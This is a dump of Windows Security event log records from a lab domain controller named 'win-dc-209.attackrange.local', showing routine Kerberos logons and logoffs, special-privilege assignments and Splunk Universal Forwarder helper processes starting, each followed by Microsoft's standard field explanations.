The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264228
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7066
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264233
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7D57
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264232
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D7D57
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62431
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:57:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264231
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D7D57
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264235
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264234
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264236
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264237
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264238
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264240
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264243
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DB788
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264242
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DB788
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62444
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264241
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DB788
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264254
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBC3D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264253
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264252
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD73
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264251
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBDE5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62449
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264250
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBDE5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264249
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBD73
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62448
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264248
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD73
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264247
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBD2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264246
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBD2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264245
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7DBC3D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62447
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:59:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264244
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7DBC3D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264256
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1718
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
